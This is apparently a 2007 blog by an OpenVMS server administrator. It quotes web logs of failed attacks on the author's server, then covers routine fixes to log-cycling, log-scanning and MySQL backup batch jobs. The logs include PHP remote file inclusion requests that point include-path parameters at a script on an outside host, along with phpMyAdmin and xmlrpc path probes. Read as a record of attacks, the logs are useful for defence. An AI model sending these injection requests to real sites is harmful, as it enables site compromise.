If it weren’t a pest to other systems, I could laugh loudly. The thought you could bring the server down by simply accessing default locations as if this were a standard Windows or Linux system. Take last week’s server log for the public web:
69.13.158.140 - - [19/Feb/2007:13:29:20 +0100] "GET /a1b2c3d4e5f6g7h8i9/nonexistentfile.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:20 +0100] "GET /adxmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:20 +0100] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:20 +0100] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:21 +0100] "GET /phpadsnew/adxmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:21 +0100] "GET /phpads/adxmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:21 +0100] "GET /Ads/adxmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:22 +0100] "GET /ads/adxmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:22 +0100] "GET /xmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:22 +0100] "GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:22 +0100] "GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:23 +0100] "GET /blog/xmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:23 +0100] "GET /drupal/xmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:23 +0100] "GET /community/xmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:24 +0100] "GET /blogs/xmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:24 +0100] "GET /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:24 +0100] "GET /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
He tried it again some time later, given the the same address and, at first glance, the same script, and of course, the same outcome: NOTHING.
The same applies to this attempt. I’m not sure but it looks like a forum package to me:
216.73.96.220 - - [23/Feb/2007:07:46:40 +0100] "GET /components/com_simpleboard/image_upload.php?sbp=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:40 +0100] "GET /components/com_forum/download.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:40 +0100] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:41 +0100] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:41 +0100] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:41 +0100] "GET /modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:42 +0100] "GET /modules/Forums/admin/index.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:42 +0100] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:42 +0100] "GET /modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:43 +0100] "GET /index.php?page=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:43 +0100] "GET /live/help.php?css_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:43 +0100] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:44 +0100] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
Yes, I do have MySQL and of course PHPMyAdmin, but what makes this guy think it would be on a publicly accessable site? That would be asking for trouble:
193.164.131.46 - - [25/Feb/2007:11:49:52 +0100] "GET /phpmyadmin/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:53 +0100] "GET /NoService.html HTTP/1.0" 200 2135
193.164.131.46 - - [25/Feb/2007:11:49:53 +0100] "GET /PMA/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:53 +0100] "GET /mysql/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:54 +0100] "GET /admin/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:54 +0100] "GET /db/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:54 +0100] "GET /dbadmin/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:54 +0100] "GET /web/phpMyAdmin/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:55 +0100] "GET /admin/pma/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:55 +0100] "GET /admin/phpmyadmin/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:55 +0100] "GET /admin/mysql/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:55 +0100] "GET /phpmyadmin2/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:56 +0100] "GET /mysqladmin/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:56 +0100] "GET /mysql-admin/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:56 +0100] "GET /main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:56 +0100] "GET /phpMyAdmin-2.5.6/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:56 +0100] "GET /phpMyAdmin-2.5.4/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:57 +0100] "GET /phpMyAdmin-2.5.1/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:57 +0100] "GET /phpMyAdmin-2.2.3/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:57 +0100] "GET /phpMyAdmin-2.2.6/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:57 +0100] "GET /myadmin/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:58 +0100] "GET /phpMyAdmin-2.6.0/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:58 +0100] "GET /phpMyAdmin-2.6.0-pl1/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:58 +0100] "GET /phpMyAdmin-2.6.3-pl1/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:58 +0100] "GET /phpMyAdmin-2.6.3/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:59 +0100] "GET /phpMyAdmin-2.6.3-rc1/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:59 +0100] "GET /phpMyAdmin-2.6.2-rc1/main.php HTTP/1.0" 302 341
I wonder what HIS system would look like. That would be an easy site to crack!
08-Mar-2007
Some maintenace on system management procedures
needed to be done.
For some reason, the procedure that cycles the operator log and scans it for spam attempts hasn’t been working properly since the beginning of the week. That is: there has been no copy of operator log files to the operator web, and the spamlist hasn’t been updated. I just found that this was quite obvious since creation of new logfiles did not occur. The log of the job does not show an error, but new files were not created, and the current one was the one of last Monday.
I recall I had made slight changes last weekend, and the next run failed because the input file wasn’t found when the batch job started:
$ type scan_log.log.-2
Error opening primary input file SYS$INPUT
File not found
SYSTEM job terminated at 5-MAR-2007 00:00:00.10
$
so there was no job entry on the next day either.
I thought I hadn’t purged, but it seems I had. Well, no problem: submit it again – forgetting it needs to be run as a user that has OPER privilege enabled by default. My standard account has OPER priv – as an authorized privilege, not enabled by default. Hence, no REPLY…. Weird that it didn’t show up in the log:
Starting new log.operator
$ define/user sys$command _opa0:
$ reply/enable
$ define/user sys$command _opa0:
$ reply/log ! nieuwe logfile
$ define/user sys$command _opa0:
$ reply/disable
$ wait 00:01 ! wait a minute
$ set nover
OPERATOR.LOG does not signal this either – obviously:
%%%%%%%%%%% OPCOM 4-MAR-2007 23:26:50.87 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 216.148.221.135 Port: 28690
%%%%%%%%%%% OPCOM 4-MAR-2007 23:39:44.59 %%%%%%%%%%%
Logfile time stamp
%%%%%%%%%%% OPCOM 5-MAR-2007 00:39:44.60 %%%%%%%%%%%
Logfile time stamp
%%%%%%%%%%% OPCOM 5-MAR-2007 01:04:04.41 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 156.153.255.213 Port: 33873
The problem is now solved – I hope. I ran the script – unaltered – with privs enabled and the logfile has been cycled and scanned. So I altered teh script be be sure it will be re-submitted under the right user now.
We’ll see tomorrow.
More typo’s
In the same log, it turns out that scanning for failed logins – at least, I suspect the problem to be there – has some typo as well. It does work, I saw the log has been updated, but I simply don’t like errors like this:
...
%BACKUP-S-CREATED, created WEB_DISK2:[private.ftp]tcpip$ftp_run.txt;77
%DCL-W-EXPSYN, invalid expression syntax - check operators and operands
Done
...
Tonight, it will run with verification enabled, so hopefully the error will show up in the log, so I can do some repair. Lucily, this script is called by the daily log scanner and not submitted by itself, so any change will be effective immediately.
MySQL backup
doesn’t run well either in batch. The resulting SQL script ends:
/*!40000 ALTER TABLE `bbposts_text` DISABLE KEYS */;
LOCK TABLES `bbposts_text` WRITE;
%TYPE-F-WRITEERR, error writing SYS$OUTPUT:.;
-RMS-F-SYS, QIO system service request failed
-SYSTEM-F-EXQUOTA, process quota exceeded
Same problem as the log scanner: it doesn’t run under an account that is sufficiently privileged by default – so that has been changed as well, and the job re-submitted. One more to be checked tomorrow.